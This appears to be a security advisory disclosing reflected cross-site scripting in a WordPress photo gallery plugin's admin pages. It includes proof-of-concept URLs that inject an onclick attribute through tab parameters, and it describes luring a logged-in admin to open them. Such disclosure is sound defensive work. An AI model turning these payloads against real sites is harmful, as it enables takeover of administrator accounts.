The plugin does not escape some parameters before outputting it back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open one of the URLs below
v < 5.1.7 - https://example.com/wp-admin/admin.php?page=gallery-photo-gallery-settings&ays_gpg_tab=" accesskey=X onclick=alert(/XSS/)//
v < 5.1.6 - https://example.com/wp-admin/admin.php?page=gallery-photo-gallery&action=edit&gallery=1&ays_gpg_settings_tab=" accesskey=X onclick=alert(/XSS/)//
The XSS will be triggered when pressing ALT+SHIFT+X on Windows and CTRL+ALT+X on OS X